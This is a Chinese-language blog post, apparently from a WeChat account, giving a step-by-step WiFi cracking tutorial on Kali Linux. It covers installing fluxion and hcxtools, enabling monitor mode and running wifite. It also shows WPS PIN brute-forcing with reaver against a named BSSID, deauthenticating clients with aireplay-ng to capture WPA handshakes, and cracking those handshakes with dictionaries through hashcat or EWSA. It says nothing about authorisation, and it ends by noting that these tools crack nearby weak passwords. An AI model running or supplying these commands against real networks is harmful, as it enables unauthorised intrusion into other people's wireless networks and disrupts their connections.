点击上方蓝字 江湖评谈设为关注/星标
前言
本篇看下wifi渗透的内容,USB类型的免驱可监听无线网卡,vm虚拟机Kali Linux菜单栏-》虚拟机-》可移动设备-》Ralin802连接。wifite可以查看客户端连接人数,便于抓包。ewsa可以查看网络是哪种类型,比如wpa,wpa2类型。wash -i wlan0可以查看wps是否加锁设置。
fluxsion
下载:
git clone https://github.com/FluxionNetwork/fluxion.git
进入fluxion目录,然后运行命令行带上-i ,带上-i让它下载缺失的组件
cd fluxion
./fluxion.sh -i
扫描到的的SSID绿色即为有客户端,可以抓包
攻击类型
wpa/wpa2的PSK攻击分为以下五种:pmkid攻击,根据wpa的四次握手传输的pmk码,随机码,进行逆向攻击。wps pin攻击,这个共计需要路由器开启wps,并且lck没有锁定,可以通过reaver来进行攻击。pixie攻击,区分路由器的生产商,以及路由漫游等功能进行攻击。抓握手包跑字典,fluxion的虚拟AP。等五种常用攻击方式。
wifite
wifite要进行pmkid攻击需要工具hcxtools,安装如下:
apt-get install hcxtools
打开网卡监听模式
sudo ip link set wlan0 down
sudo iw dev wlan0 set type monitor
sudo ip link set wlan0 up
sudo airmon-ng check kill
开启抓包
sudo wifite --skip-crack
其中 --no-wps选项跳过wps攻击, --no-pmkid跳过pmkid攻击,--skip-crack跳过用wifite跑包,-5的话是监听5G频段
ctrl+c输入编号,然后当前目录hs文件夹下面是抓包文件
wps+Pin
查看当前网卡名,当前是wlan0
ip l
Kali下面可以用如下命令搜索WPS开启的Mac机器(也可以通过wifite来查看wps的开启)
wash -i wlan0
通过Mac来计算pin和psk
sudo reaver -i wlan0 -b F0:55:01:77:EA:1C -c 1 -vv
sudo reaver -i wlan0 -c [channel] -b [bssid] -v -S -d 0 -t 1
sudo reaver -i wlan0 -b <目标网络的BSSID> -c <目标网络的信道> -vv
-i:无线网卡 -b:mac地址 -c:CH值 -vv:详细信息
Kali Linux Cap包
结束无线进程:
sudo airmon-ng check kill
查看周边无线的CH值
sudo airodump-ng wlan0
扫描CH值所在的无线网络
sudo airodump-ng -c CH值 -w 保存数据包的文件名 wlan0
新开一个窗口,对扫描CH值所在的无线网路进行断网抓包
sudo aireplay-ng -a 目标AP的mac地址 -0 4 wlan0
如果扫描CH值窗口出现了类似如下(CH值为11的mac地址为D0:76:E7:A3:2F:B4的wifi):
CH 11 ][ Elapsed: 54 s ][ 2024-06-29 15:50 ][ WPA handshake: D0:76:E7:A3:2F:B4
则表示抓包成功,可以到kali linux的/home/user目录下找到扩展名为.cap的文件,即是抓包后的文件。
结尾
抓包工具则可以wifite,fluxion即可抓到高质量包。最后需要工具跑下字典,比如wifipr(Wireless Password Recovery)就很不错,ewsa(Elcomsoft Wireless Security Auditor)等,还有hashcat。这几个基本上可以跑出周边弱密码。
往期精彩回顾